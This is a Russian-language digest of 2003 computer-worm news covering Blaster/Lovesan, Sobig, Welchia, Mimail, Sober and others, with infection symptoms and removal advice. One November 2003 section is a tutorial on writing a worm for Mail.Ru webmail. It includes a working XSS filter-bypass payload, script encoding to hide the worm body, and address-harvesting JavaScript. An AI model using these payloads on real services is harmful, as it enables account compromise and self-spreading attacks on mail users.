30 июля 2003 года В сети обнаружены E и F варианты червя Gruel, которые распространяются по электронной почте и в программе обмена файлами KaZaA. Оба червя чрезвычайно опасны, поскольку удаляют файлы, необходимые для нормальной работы Windows (AUTOEXEC.BAT, CONFIG.SYS и др.). В процессе работы эти программы открывают несколько окон Панели управления, открывают и закрывают лоток устройства для чтения компакт-дисков, отключают Панель задач, скрывают содержимое диска C: таким образом, что поиск файлов становится невозможным и др.
После заражения компьютера черви выводят на экран монитора ложные сообщения об ошибках Windows. Создают записи в реестре Windows с различными ключами (в зависимости от того, был ли перезагружен компьютер или нет). Таким образом, Gruel.E и Gruel.F обеспечивают себе запуск при каждой загрузке файлов с расширением exe, com, bat, pif или файлов программы HyperTerminal.
Основное отличие между ними заключается в том, что они распространяются в файлах-вложениях с различными именами. К письму, зараженному червем Gruel.E, прикреплен файл OFFICEXPTRIAL.EXE, а у Gruel.F этот файл называется PROTECT_REMOVE_TOOL.EXE.
31.07.2003 Lorsis
Компания Symantec предупреждает о появлении нового деструктивного червя W32.Lorsis.Worm. Он распространяется через файлобменную сеть Kazaa, маскируясь под утилиты для взлома популярных программ или порноклипы. Файл с вирусом имеет фальшивое расширение (.zip, .avi, .jpg или .doc), после которого идут несколько пробелов и настоящее расширение - .exe. После запуска червь копирует себя в общие для пользователей Kazaa папки, стирает редактор реестра и утилиту MSConfig.exe, обеспечивает свой автозапуск. Если системная дата находится в интервале с 6 по 31 декабря, червь создает и запускает командный файл, в котором содержатся команды на удаление системных файлов в папках C:\Windows, C:\Windows\System и C:\Windows\System32.
1.08.2003 VBS.Bingd@mm
Компания Symantec предупреждает о появлении в интернете нового почтового червя, названного VBS.Bingd@mm. В "Лаборатории Касперского" эту же программу называют Trojan.VBS.NoExp, а по классификации McAfee она называется VBS/Generic@MM. Червь написан на Visual Basic, а страной его происхождения является, скорее всего, Китай. Во всяком случае, тема и основной текст письма с вирусом написаны на китайском языке. При запуске вложенного в письмо файла активируется червь. Он рассылает себя по семи первым адресам из книги Outlook Express и модифицирует реестр, отключая ряд элементов интерфейса оболочки Windows и Internet Explorer. Отключаются, в частности, контекстные меню.
Насколько опасен вирус для российских пользователей, сказать сложно. С одной стороны, вряд ли письмо на китайском заинтересует многих, но с другой, если в системе не установлена поддержка китайского зыка, текст письма отобразится в виде абракадабры. В этом случае пользователь может предположить наличие проблем с кодировками и открыть зараженный вложенный файл.
dl // 12.08.03 Приполз новый червяк
Proantivirus Lab сообщает о появлении нового опасного и быстро распространяющегося (в том числе и по России) червя, использующего недавно открытую дырку в RPC во всех ОС семейства NT. Заражение удаленное, через 135-й порт, исполняет команды из-под Local System.
Признаки заражения:
° Наличие файлов "MSBLAST.EXE", "TEEKIDS.EXE" или "PENIS32.EXE" в системном каталоге Windows (обычно WINDOWS\SYSTEM32\)
° Внезапная перезагрузка компьютера после соединения с Интернетом каждые несколько минут
° Многочисленные сбои в работе программ Word, Excel и Outlook
° Сообщения об ошибках, вызванных файлом "SVCHOST.EXE"
° Появление на экране окна с сообщением об ошибке (RPC Service Failing)
- Сообщение об ошибке (RPC service failing) приводящее к перезагрузке системы.
- Наличие в системном реестре ключа HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! bill
Первую атаку новый компьютерный червь нанес 11 августа по компьютерным сетям США. За несколько часов работы червь побил все рекорды скорости распространения. В штатах он долго не задержался и стал лавинообразно распространяться дальше. Интернет-форумы тут и там пестрели сообщениями о том, что машины начинают самопроизвольно перезапускаться. В среду утром появилась информация о том, что новый вирус успел уже поразить 400 компаний по всему миру и около 20 тыс. персоналок. Что же это за зверь такой страшный?
За пару дней вирус успел приобрести несколько имен (W32/Lovsan.worm [McAfee], Win32.Poza [CA], Lovsan [F-Secure], WORM_MSBLAST.A [Trend], W32/Blaster-A [Sophos], W32/Blaster [Panda], W32.Blaster.Worm [Symantec Security]) и стал определяться всеми антивирусными программами. Для проникновения на компьютер Lovsan использует обнаруженную 16 июля хакерской группой Last Stage of Delerium уязвимость в системах Windows NT 4.0, Windows 2000, Windows XP и Windows 2003. Бреш была обнаружена в службе DCOM RPC. Distributed Component Object Model (распределенная компонентная объектная модель) - это модель обмена данными, служащая для совместной работы различных приложений. А RPC (Remote Procedure Call) - это служба, обеспечивающая соединение между клиентом и сервером, используемая архитектурой DCOM.
Незамедлительно после выхода в свет сообщения об уязвимости, всеми любимая корпорация подтвердила эту информацию и классифицировала дыру, как опасную. Через пять дней Microsoft уже выпустила в свет заплатки, закрывающие бреш. Все вроде хорошо, да вот только большинство пользователей не обратили внимания на это происшествие и никаких заплаток на свой компьютер не ставили.
В первых числах августа появился первый червь, проникающий в систему через вышеописанную бреш - Autorooter. Вирус имел слабое место - система распространения практически не реализована. Поэтому шум вокруг него затих, и должного внимания инциденту не уделили, а зря…
И вот, меньше чем через две недели появляется новый червь с прекрасно реализованной системой распространения. Для того чтобы заразиться новой болезнью, вам просто надо быть в интернете - вирус сам вас найдет. Происходит это так. Червь проверяет 135-й порт машин, висящих в инете. Если преград для внедрения в систему жертвы нет (Windows подходящий, заплатки не стоят), то червь начинает атаку. На порт 135 червь посылает запрос для предоставления полного доступа к атакуемому. Если все "хорошо", то на компьютере-жертве открывается порт 4444 для ожидания последующих команд. Одновременно червяк слушает порт 69 UDP на первоначально зараженном компьютере. Как только от новой жертвы к нему поступает TFTP-запрос, червь загружает на компьютер жертвы файл носителя MSBLAST.EXE размером 6175 байт. Файл записывается в системную папку Windows и запускается.
В системном реестре появляется следующая строка для запуска червя после перезагрузки системы: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "windows auto update" = msblast.exe В коде червя была обнаружен следующий текст: "Billy Gates why do you make this possible? Stop making money and fix your software!" (Билли Гейтс, почему ты допускаешь такое? Перестань делать деньги и исправь свое ПО!). и I just want to say LOVE YOU SAN!! Bill (Просто хочу сказать - любите свои системные сети).
Именно благодаря фразе "LOVE YOU SAN" червь получил одно из своих названий "lovsan". Некоторые отечественные СМИ букву "a" заменили на "u", видимо подумав, что название происхо-дит от слова "sun".
Для простого юзера главная опасность нового червя заключается в том, что он генерирует огромный объем избыточного трафика, переполняющего каналы передачи данных интернета. Побочным явлением нового вируса являются еще и постоянные перезагрузки компьютера с появляющейся ошибкой вида:
Перезагрузка компьютеров в планы злоумышленников, повидимому, не входила. Вирус не должен был никак себя проявлять до часа Х, а именно до 16 августа. На этот день намечена крупномасштабная DDoS атака всех копий червя на сайт windowsupdate.com, содержащий обновления Windows. Пакеты данных с зараженных компьютеров, бомбардируя сайт, сделают его недоступным. Но секрет раскрыт раньше времени. Похоже, теракт не удался. Массированная атака с помощью компьютеров-жертв - вот цель, которую преследовали и создатели предыдущего вируса Autorooter.
"Предупрежден - значит вооружен!" - так то оно так, да вот только предупреждены, как всегда, далеко не все. Позвонив свои знакомым, вы наверняка узнаете, что их компьютер постоянно перезагружается и в чем проблема - для них не ясно. Поэтому говорить о победе еще рано.
Итак: если ваш компьютер постоянно перезагружается; если в папке windows\system32 появился файл msblast.exe; если в реестре появилась вышеописанная надпись - вы тоже на крючке у нового червя. Но избавится от него очень просто - либо всю эту гадость и удалить самостоятельно, либо запустить специально выпущенную специалистами компании Symantec утилиту W32.Blaster.Worm Removal Tool, удаляющую из системы самого червя и устраняющую все последствия его жизнедеятельности. Никаких настроек - запустил и готово.
После удаления неплохо было бы поставить заплатку на Windows с сайта windowsupdate.com (пока он еще не умер :)) и с помощью межсетевого экрана заблокировать порты 135, 69 и 4444 (если, конечно, они не используются другими приложениями).
Мой компьютер исключением не стал. Все прелести нового червячка я успел попробовать на себе.Теперь нам остается ждать, правда, совсем не долго. Но даже если 16 августа ничего и не произойдет, то что-нибудь произойдет позже, с появлением нового червя. Черви были, есть и будут.
15.11.2004 Лаборатория Касперского" прогнозирует, что уже в ближайшие часы может начаться повторная глобальная эпидемия этой вредоносной программы, поскольку обе модификации "Lovesan" могут беспрепятственно существовать на одном и том же компьютере. "Иными словами, все компьютеры, зараженные оригинальной версией этого червя, скоро также будут атакованы его новой модификацией. Учитывая, что количество инфицированных систем сейчас достигает 300 тысяч, рецидив эпидемии будет означать по крайней мере удвоение этого числа, что повлечет за собой непредсказуемые последствия, - комментирует Евгений Касперский, руководитель антивирусных исследований "Лаборатории Касперского", - В худшем случае мировое сообщество ждет повторение ситуации января 2003 г., когда из-за червя "Slammer" значительно замедлилась работа интернета и наблюдались региональные отключения сети".
Технологически новая модификация "Lovesan" ничем не отличается от оригинала. Изменения коснулись только имени файла-носителя червя (TEEKIDS.EXE вместо MSBLAST.EXE), технологии его упаковки (утилита FSG вместо UPX) и текстовых строк внутри программного кода, которые содержат ненормативную оскорбительную лексику в адрес Microsoft и антивирусных компаний.
В полночь, 16 августа, заражённые вышеназванными вирусами компьютеры начали планомерно обращаться к адресу предполагаемого сервера Microsoft, на котором последняя хранит информацию о патчах и обновлениях. По плану злоумышленников, возросший трафик "забьёт" доступ к серверу тех пользователей, которые захотят скачать патч. Однако в одном моменте авторы вируса просчитались - "черви" были проинструктированы на вызов сайта, но на самом-то деле, истинный адрес выглядит так. Конечно, ссылка также была работоспособна - при её вызове проистекало автоматическое перенаправление на истинный адрес, вот только специалисты Microsoft, изучившие тело "червя", предусмотрительно отключили этот самый автоматический редирект. Реальный адрес сайта Windows Update - жив и здравствует, так что все желающие могут воспользоваться его услугами.
Кроме того, нелишне будет напомнить, что у Microsoft существует ещё такой сайт, как, на котором вы также можете найти необходимую информацию о "лазейках" в системе безопасности, вирусах, поражающих Windows и другие сведения по теме. Естественно, там существует, подробно освещающий текущую эпидемию и содержащий ответы на часто задаваемые вопросы, инструментарий для сканирования системы, ссылки на патчи, советы специалистов и прочую полезную информацию. В частности, на самом видном месте размещена информация о том, что в настоящее время под видом рассылки патчей (якобы защищающих вас от "червей" msblast, lovesan и пр.) злоумышленники по электронной почте рассылают вирусы от имени Microsoft...
20 Август 2003 Новая версия вируса Sobig
Пока весь мир следил за распространением вируса Blaster, вирусописатели не сидели сложа руки. Только что выловлена новая версия червя Sobig, впервые появившегося в интернете в начале года. Как сообщает антивирусная компания "Лаборатория Касперского", сообщения о случаях заражения данной вредоносной программой уже поступили из России и нескольких европейских стран.
Sobig.f практически ничем не отличается от своих предшественников. Косметические изменения коснулись лишь признаков рассылаемых писем (тема, текст, имена вложенных файлов) и даты деактивации. 10 сентября червь переходит в спящий режим и никак более не выдает своего присутствия на компьютере.
Sobig распространяется по электронной почте в виде вложенных файлов и по ресурсам локальной сети, создавая свои копии на открытых дисках. Для почтовой рассылки он сканирует файлы зараженного компьютера, находит в них адреса и незаметно посылает на них свои копии. Чтобы заставить пользователя запустить свой файл-носитель червь использует разнообразные методы социального инжиниринга, в частности, маскируясь под письма от технической поддержки Microsoft. Среди побочных действий "Sobig" необходимо отметить возможность загрузки и установки с удаленных web-серверов на зараженный компьютер обновленных версий червя или внедрять в систему программы-шпионы.
Компания Network Associates сообщает способ обнаружения и нейтрализации вируса Sobig.F. О наличии вируса в системе свидетельствуют следующие симптомы:
Чтобы избавиться от вируса, необходимо удалить с жесткого диска файлы вируса и стереть все записи вируса в реестре. Для этого в операционной системе Win9x/ME необходимо перезагрузиться в безопасный режим работы (Safe Mode) и удалить файлы WINPPR32.EXE и WINSTT32.DAT из системной папки Windows. В реестре необходимо удалить переменную TrayX из папок HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run и HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. В операционной системе WinNT/2K/XP перезагружаться в безопасный режим необязательно - достаточно в диспетчере задач удалить процесс WINPPR32.EXE.
21.08.03 Под маской "доброго" вируса скрывается вредитель
"Welchia" принадлежит к разряду вирусов, несущих определенную гуманитарную функцию. Они атакуют компьютер, проникают в систему, но не наносят какого-либо вреда. Наоборот, они удаляют другие вредоносные программы и иммунизируют компьютеры.
Также и в случае с "Welchia". Этот червь заражает компьютеры подобно "Lovesan": через бреши в системе безопасности. Однако, в отличие от него, "Welchia" атакует не только уязвимость в службе DCOM RPC, но также брешь WebDAV в системе IIS 5.0 (специальное программное обеспечение для управления web-серверами). Для проникновения на компьютеры червь сканирует интернет, находит жертву и проводит атаку по портам 135 (через брешь в DCOM RPC) и 80 (через брешь WebDAV). В ходе атаки он пересылает на компьютер свой файл-носитель, устанавливает его в системе под именем DLLHOST.EXE в подкаталоге WINS системного каталога Windows и создает сервис "WINS Client".
После этого "Welchia" начинает процедуру нейтрализации червя "Lovesan". Для этого он проверяет наличие в памяти процесса с именем "MSBLAST.EXE", принудительно прекращает его работу, а также удаляет с диска одноименный файл. Далее "Welchia" сканирует системный реестр Windows для проверки установленных обновлений. В случае, если обновление, закрывающее уязвимость в DCOM RPC не установлено, червь инициирует процедуру его загрузки с сайта Microsoft, запускает на выполнение и, после успешной установки, перегружает компьютер.
Мало того, в "Welchia" предусмотрена и возможность самоуничтожения, которая активируется если текущий год равен 2004.
Появление сетевого червя "Welchia" вызвало бурные дискуссии в интернет-сообществе. Главным вопросом обсуждения стало право на существование вредоносных программ, которые борются с себе подобными. К сожалению, многие пользователи заблуждаются относительно преимуществ и недостатков "Welchia".
Полезных вирусов не бывает, полагают специалисты "Лаборатории Касперского". Эти два понятия несовместимы. Побочные действия "Welchia" по удалению "Lovesan" и попытке обновления Windows - это верхушка айсберга, которая вводит пользователей в заблуждение. Настоящее значение этой вредоносной программы скрывается под водой и может остаться незамеченным.
Во-первых, "Welchia" совершает несанкционированный взлом компьютера, что однозначно классифицируется законодательными актами как преступление. Червь всячески скрывает свое присутствие в системе, а также атакует IIS-серверы, которых он оставляет уязвимыми.
Во-вторых, червь модифицирует зараженную систему и загружает на нее потенциально опасные объекты (модуль FTP-сервера, файл-носитель вредоносной программы). Это может привести к нарушению работы операционной системы и открывает злоумышленникам "лазейку" на компьютер. Например, с помощью FTP-сервера с зараженной системы можно украсть информацию.
В-третьих, "Welchia" создает поток вредоносных данных. Это дискредитирует владельца зараженного компьютера, требует оплаты дополнительного сетевого трафика, а также засоряет интернет-каналы. Последнее обстоятельство может спровоцировать глобальную интернет-катастрофу: при достаточно большом количестве инфицированных систем объем вирусного трафика перегружает каналы передачи данных и вызывает замедление Сети.
Наконец, червь создает у пользователей ложное чувство безопасности и провоцирует пассивное отношение к собственной защите. Подобное безразличие и бездействие пользователей ведет к непредсказуемым последствиям. В результате инт ернет может превратиться в поле битвы вирусов, а сетевой трафик - в скопище вредоносных программ, борящихся за превосходство друг над другом.
В заключение, "Лаборатория Касперского" еще раз утверждает: нет полезных вирусов. Есть вирусы деструктивные и недеструктивные. Но все они являются киберпреступлением, поскольку выполняют несанкционированные действия и всегда имеют негативные побочные действия.
04 Ноябрь 2003 Тема, данной статьи - изучение работы червей, использующих для перемещения уязвимости web-интерфейсов в почтовых сервисах. Но именно изучение, поскольку использование данного материала, выходит за пределы дозволенного законодательством...
Написание червей достаточно интересное занятие, поскольку для их функционирования постоянно приходится находить новые решения, порой даже далекие от стандартов. Для написания червей, использующих web-интерфейс, положение еще более усугубляется рядом факторов, но о них мы поговорим немного позже, а пока остановимся на выборе платформы для его функционирования.Он далеко не случаен, именно с этого почтового сервиса начиналась моя "исследовательская работа".
Внедрение
Первое, чего необходимо добиться, это использование JavaScript, поскольку Mail.Ru фиксирует и, соответственно, фильтрует все попытки его внедрения в письмо. В ходе экспериментов было установлено, что одна из конструкций, все таки остается незамеченной и благополучно позволяет внедрить произвольный скрипт. Найденная ошибка связана с обработкой событий для HTML тэгов. В стандартном случае, сервер успешно блокирует их исполнение. Например:
<IMAGE SRC="c:\noImage" onError="alert('Java execution!')">
успешно опознается и блокируется. Для опознания в данном случае был использован шаблон " onError=". Но создатели, видимо, не учли тот факт, что вполне приемлемой является, также и конструкция:
<IMAGE SRC="c:\noImage"/onError="alert('Java execution!')">
В результате работы которой на мониторе появится сообщение "Java execution!". Этого вполне достаточно для написания червя, но не нам Посудите сами, код червя получится достаточно большей и поэтому его неудобно содержать в обработчике onError, в добавок код будет отфильтрован, что может пагубно повлиять на его работоспособность. Есть несколько выходов:
Первый и второй варианты - неприемлемы, поскольку червь должен быть независимым от внешних Интернет ресурсов. В нагрузку, перекинув пользователя на другой сервер, мы выходим из доменной зоны почтового сервера. Остается только шифрование, как наиболее рациональное решение. Поскольку способов зашифровать произвольный скрипт достаточно много, то выбирать естественно вам. Но я для этих целей воспользовался Windows Script Encoder. О его работе я когда-то писал статью на websec.ru. Но, тем не менее, попробую вкратце объяснить как он работает. Запускаете "screnc.exe шифрумый_файл зашифрованный_файл". Таким образом строка:
alert('Java execution!')
примет вид:
#@~^GQAAAA==C^+.D`E9l7l,n6m;YbWUZE#iiQgAAA==^#~@
Преимущество данного (зашифрованного) формата в том, что он не содержит запрещенных символов. Для его использования нет нужды в дешифраторе, поскольку он встроен в Internet Explorer. А исполнить его можно указав соответствующий язык программирования в тэге <script>:
<SCRIPT language="JavaScript.Encode">
#@~^GQAAAA==C^+.D`E9l7l,n6m;YbWUZE#iiQgAAA==^#~@
</SCRIPT>
Для проделки всего вышеописанного на Mail.Ru, загрузим зашифрованный скрипт как main.gif, а в приаттаченый HTML файл внедрим скрипт исполняющий его:
<html>
<image src="c:\noImage"/onError="document.all.tags('sc' +'ript')[0].language='JS'+ 'cript.Encode';document.all.tags('sc'+ 'ript')[0].src= 'http://win.mail.ru/cgi-bin/readmsg/main.gif?id=' +document.forms[0].id.value+ ';0;1&mode=attachment'">
На данном этапе, следует с кое-чем разобраться. Объект "document.all.tags('sc'+'ript')[0].language" указывает на язык первого использованного скрипта в HTML файле, указав в качестве значения "'JS'+'cript.Encode" мы сообщаем, что загруженный в этот тэг скрипт будет зашифрован. Далее мы указываем URL для используемого скрипта, в данном случае мы ссылаемся на первый аттач к нашему письму. Чтобы вы не думали, что все делается через задницу: такие конструкции - единственный способ добраться к присоединенному файлу (поскольку все работает на идентификаторах), а шифрование поможет нам спрятать тело червя и в будущем доставит трудности при попытке расшифровки его исходного кода работниками Mail.Ru.
Новые решения
Для рассылки червя на все адреса из папки Inbox (вообще-то только те, что принадлежат компании Mail.Ru. В часности @mail.ru, @inbox.ru, и т.д.), необходимо знать их! Это составляет трудности, поскольку все действия, как уже говорилось, осуществляются с ID писем... Поэтому приходится загружать в отдельный фрейм каждое письмо, а уж потом из них выдирать e-mail отправителя. Согласитесь, такой подход достаточно медленно работает. Поэтому, для ускорения процесса, мной была разработана технология "частичной загрузки". Ее суть заключается в том, чтобы не загружать весь документ целиком, а только до нужной нам позиции. Достичь данного результата не составляет особых затруднений, если немного пошевелить мозгами.
Технология проста - пытаться обратится к HTML элементу, находящемуся после требуемого. Если происходит ошибка, значит документ еще не загружен до требуемого уровня, в противном случае получаем требуемую информацию. Следует заметить, что устанавливается свой обработчик ошибок. Вот примерная реализация, вышеописанного метода:
ErrorStatus=0; //no errors
.....................
function ErrorHook()
{
ErrorStatus=1;
window.setInterval('checkInbox()',100);
return true;
}
function checkLoadStatus()
{
ErrorStatus=0;
window.onerror=ErrorHook;
}
function checkInbox()
{
сheckLoadStatus();
.......................... //обращение к элементу
if(!ErrorStatus)
{
//NO ERRORS
}
else
{
//ERRORS
}
}
Это часть скрипта-червя, которая и реализует "частичную загрузку". Все происходит в несколько шагов:
Поскольку данная уязвимость еще не исправлена, позволю себе немного наглости и не раскрою вам исходного кода червя. В продолжении данной статьи мы более детально изучим работу почтового сервиса Mail.Ru. А пока следует остановится (людям которые поняли о чем идет речь, этого должно быть достаточно).
В данном варианте червь ничего не делает, кроме размножения.
"Mimail.c" является классическим почтовым червем, распространяющимся через электронные письма, которые выглядят следующим образом: Адрес отправителя: james@домен получателя Заголовок: Re[2]: our private photos Текст: Hello Dear!, Finally i've found possibility to right u, my lovely girl :) All our photos which i've made at the beach (even when u're without ur bh:)) photos are great! This evening i'll come and we'll make the best SEX :) Right now enjoy the photos. Kiss, James. Имя вложенного файла: photos.jpg.zip Интересно отметить, что адрес отправителя зараженных сообщений формируется с помощью добавления к нему домена получателя. Таким образом, затрудняется локализация эпицентра заражения и у пользователя может создаться впечатление, что письмо пришло от одного из коллег или знакомых. Если пользователь имел неосторожность открыть вложенный файл, то "Mimail.c" запускает процедуры внедрения на компьютер и дальнейшего распространения по сети. Прежде всего, червь копирует себя в каталог Windows с именем "netwatch.exe", регистрирует этот файл в ключе автозапуска системного реестра операционной системы и создает ряд дополнительных служебных файлов. В частности, при создании одного из этих файлов червь использует встроенные процедуры ZIP-архивации. Для рассылки зараженных писем "Mimail.c" также использует встроенные функции - специальную процедуру для распространения по протоколу SMTP. Червь сканирует файлы в каталогах "Shell Folders" и "Program Files" и считывает из них строки, похожие на адреса электронной почты. По найденным адресам "Mimail.c" незаметно для пользователя рассылает свои копии. Червь обладает опасным побочным действием, которое может вызвать существенный ущерб для пользователей платежной системы "E-Gold". В частности, "Mimail.c" следит за активностью приложений "E-Gold", установленными на зараженном компьютере, считывает из них конфиденциальные данные и отсылает на несколько анонимных адресов, принадлежащих автору червя. Помимо этого, со всех зараженных компьютеров червь осуществляет распределенную DoS-атаку на сайты www.darkprofits.com и www.darkprofits.net, отсылая на них в бесконечном цикле пакеты произвольного размера.
Nov 6 2003 Новый сетевой червь передает привет предшественнику Антивирусная компания "Лаборатория Касперского" сообщает о распространении нового сетевого червя. Вредоносная программа Sober была найдена еще в конце прошлой недели, в субботу, однако в понедельник произошел всплеск её активности. В методах, которые использует Sober, нет ничего нового. Как и множество его предшественников, он полагается, главным образом, на беспечность своих жертв. Червь распространяется по электронной почте. Чтобы заразить свой компьютер, пользователю достаточно запустить приложенный к письму файл с вирусом. Зараженные письма могут содержать самые разнообразные заголовки, тексты на английском и немецком языках, а также имена и расширения (PIF, BAT, SCR, COM, EXE) вложенных файлов. Это тоже характерная черта многих червей. Если пользователь имел неосторожность запустить вложенный в зараженное письмо файл, то "Sober" показывает на экране фальсифицированное сообщение об ошибке: "File not complete!" Затем червь создает в системном каталоге Windows три свои копии с различными именами и регистрирует их в ключе автозапуска системного реестра операционной системы. После этого "Sober" запускает процедуру распространения. Для этого он сначала находит на зараженном компьютере файлы, которые могут содержать электронные адреса (например, HTML, WAB, EML, PST и др.), считывает оттуда данные и, незаметно для владельца компьютера от его имени рассылает найденным адресатам свои копии. В теле вируса есть текст, где автор Sober выражает свое восхищение автором другого сетевого червя, Sobig. Эпидемия Sobig наделала много шума пару месяцев назад. Несмотря на его относительную безобидность, огромные потоки писем с Sobig, обрушившиеся практически на каждого пользователя интернета, существенно затрудняли работу с электронной почтой.
20/12/2003 Рецидив почтового червя "Sober"
"Лаборатория Касперского" сообщает об обнаружении новой модификации почтового червя "Sober" - "Sober.c" Семейство "Sober" принадлежит к классу почтовых червей. Настоящая модификация является третьей по счету с момента обнаружения оригинальной версии 27 октября 2003 г.
"Sober.c" отличается от оригинала расширенным функционалом и более хитрыми способами маскировки. Как и остальные представители семейства он пытается проникнуть на компьютер через зараженные электронные письма. Сами письма могут иметь различный внешний вид (на английском и немецком языках) и имена вложенных файлов. Например:
Тема:
why me?
Текст:
You say in the www. that i`m a terrorist!!!
No way out for you. I REPORT YOU !
You`ve said THAT about me
Имя вложенного файла:
terror-list.com
Необходимо отметить, что вложенные зараженные файлы могут также иметь расширения "bat", "cmd", "pif" и "scr". Если пользователь имел неосторожность запустить вложенный файл, то червь выводит на экран ложное сообщение о системной ошибке и начинает процедуру внедрения в компьютер. "Sober.c" создает в системном каталоге Windows три свои копии со случайными именами и регистрирует их в ключе автозапуска системного реестра. Таким образом, червь обеспечивает свою активизацию при каждой новой загрузке операционной системы.
После этого "Sober.c" немедленно начинает процедуру дальнейшего распространения. Прежде всего, он сканирует содержимое диска зараженного компьютера и выбирает из файлов с определенными расширениями (например, HTML, WAB, EML и т.д.) электронные адреса жертв. Затем, незаметно для пользователя рассылает по ним свои копии, используя встроенную подпрограмму работы по SMTP-протоколу.
23.12.2003 Обнаружен новый вариант червя "Sober"
На сегодняшний день зафиксированы лишь эпизодические случаи заражения червем, однако эксперты не исключают возможности массовой эпидемии. Впрочем, для российских пользователей вирус вряд ли представляет большую угрозу. Ведь, увидев в своем ящике письмо, присланное с неизвестного адреса да еще и на незнакомом языке, владелец аккаунта вряд ли рискнет просмотреть вложенный файл.